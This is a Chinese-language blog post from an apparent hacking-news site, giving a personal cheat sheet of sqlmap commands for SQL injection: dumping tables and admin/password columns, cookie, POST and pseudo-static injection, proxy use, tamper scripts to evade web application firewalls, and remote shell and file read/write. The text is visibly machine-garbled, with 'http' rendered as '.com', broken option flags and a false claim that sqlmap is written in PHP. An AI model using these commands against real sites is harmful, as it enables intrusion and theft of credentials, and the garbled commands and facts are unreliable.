SQLMAP个人总结

SQLMAP个人总结

黑客学院hacker2019-07-18 23:44:4040172A+A-

共享,沉定,攻克。

  本一篇文章纪录一下下玩sqlmap的工作经验及其指令,便捷女士们先生们及其自身今后备考查询。

  Sqlmap:Sqlmap是开源系统的自动化技术SQL引入专用工具,由PHP写出。

  Sqlmap基本指令:

  ACCESS(1个数据库查询):

  Sqlmap -u “.com://WWW.XXX.Com/shownews.asp?Id=1” – -tables (获得表)

  Sqlmap -u “.com://WWW.XXX.Com/shownews.asp?Id=1” – -columns -T 表 (获得特定表字段內容)

  Sqlmap -u “.com://WWW.XXX.Com/shownews.asp?Id=1” – -dump -C “admin,password” -T 表 (免费下载特定统计数据)

  MYSQL(好几个数据库查询):

  Sqlmap -u “.com://WWW.XXX.Com/shownews.Python?Id=1” – -dbs (获得数据库查询)

  Sqlmap -u “.com://WWW.XXX.Com/shownews.asp?Id=1” – -current -sbt (获得当今网站数据库)

  Sqlmap -u “.com://WWW.XXX.Com/shownews.asp?Id=1” – -tables -D “数据库查询” (获得特定数据库查询表)

  Sqlmap -u “.com://WWW.XXX.Com/shownews.asp?Id=1” – -columns -T “表” -D “库” (获得特定字段名內容)

  Sqlmap -u “.com://WWW.XXX.Com/shownews.asp?Id=1” – -dump -C ”admin,password” -T “表” -D “库”(免费下载特定统计数据)

  Cookie引入:Sqlmap -u “.com://WWW.XXX.Com/shownews.asp?” – -cookie “Id=1” – -level 2

  POST引入:

  包含2个层面,-r主要参数引入 – -data主要参数引入

  二者差别依据详细情况挑选

  -r:用burp抓包储存为1.txt在sqlmap主目录,通常登录框运用较多

  Sqlmap.py -r “1.txt”

  – -data:立即运用主要参数只能

  Sqlmap -u “.com://WWW.XXX.Com/shownews.asp?” – -data= “Id=1”

  伪静态引入:

  在存有引入的地区再加*,随后获得数据库查询

  sqlmap.py -u “.com://WWW.某某.Com/index.Python/index/view/Id/50*.html语言” – -dbs

  Sqlmap代理商:

  .com(S)代理商:

  主要参数:–proxy、–proxy-cred、–proxy-file和–ignore-proxy

  应用主要参数“–proxy”来设定1个.com(S)代理商,文件格式是“.com(s)://网页地址:port”。若代理商必须验证,应用主要参数“–proxy-cred”来出示验证凭据,文件格式是“username:password”。

  如:

  sqlmap -u “.com://WWW.XXX.Com/shownews.asp?Id=1” – -dbs – -proxy .com://192.168.0.1:720

  –proxy-file:载入代理商ip目录

  如:sqlmap.py -u“.com://WWW.XXX.Com/shownews.asp?Id=1″ -proxy-file=dl.txt(代理商ip文档)

  –ignore-proxy:忽视当地代理设置

  –proxy .com://local:8080 –threads 12 (可以自定进程加快) 代理商

  Tor代理模式:这一我没试过,也不贴英语的语法了。

  Sqlmap的tamper过waf脚本制作梳理:

  sqlmap拥有2个选择项 –check-waf –identify-waf 来分辨waf

  注:自身常见的脚本制作

  space2morehash.pyspace2hash.py(绕开过虑‘=’)base64encode.py(用base64编号替换成)

charencode.py space2comment.py charunicodeencode.py(字符串unicode编号) chardoubleencode.py(双网页地址编号)unmagicquotes.py(宽空格符绕开 GPC addslashes) randomcomments.py(用切分sql关键词) appendnullbyte.py(在合理负载完毕部位载入零字节数字符编码)

  Tamper英语的语法:

  batch:规定错误总体目标载入(遇到一切提醒默认设置回车键)

  tamper:应用干涉脚本制作

  -v 3(3为等級)

  留意:若不应用3等級没法再次下一阶段实际操作。

  英语的语法:sqlmap.py -u “.com://WWW.XXX.Com/shownews.asp?Id=1” -v 3 – -dbs – -batch – -tamper “space2morehash.py”

  留意:mysql access等数据库查询的tamper脚本制作還是有所区别的

  随身携带1个巨头梳理的每个数据库查询相匹配的tamper脚本制作连接

  htpp://blog.csdn.net/hxsstar/article/details/22782627

  Sqlmap之恳求延迟时间:

  Sqlmap.py -u “.com://WWW.XXX.Com/shownews.asp?Id=1” – -tables – -delay 0.6(时间延迟)

  假如有网址dba管理权限,且可以载入载入文档,那么可以立即Os-shell或是下列指令

  – -file-read /home/WWW/index.Python 载入特定文档

  – -file-write 载入当地文档(- -file-write “c:\test\1.txt” – -file-dest “/home/WWW/feizhu.txt” 当地的1.txt文档载入到远程服务器feizhu.txt(此地必须有网址载入管理权限)

  sqlmap连接数据库:

  sqlmap.py -d mysql://test:test@localhost:3306/test –sql-shell

  或许也有许多文中沒有涉及的主要参数,事件还有机会再升级。


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 2条评论
  • 双笙晌融2022-05-29 05:06:38
  • f –identify-waf 来分辨waf  注:自身常见的脚本制作  space2morehash.pyspace2hash.py(绕开过虑‘=’)base64encode.py(用base64编号替换成)charencode.py space2comment.py charunicod
  • 孤央而川2022-05-29 00:59:32
  • ode.py(双网页地址编号)unmagicquotes.py(宽空格符绕开 GPC addslashes) randomcomments.py(用切分sql关键词)

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理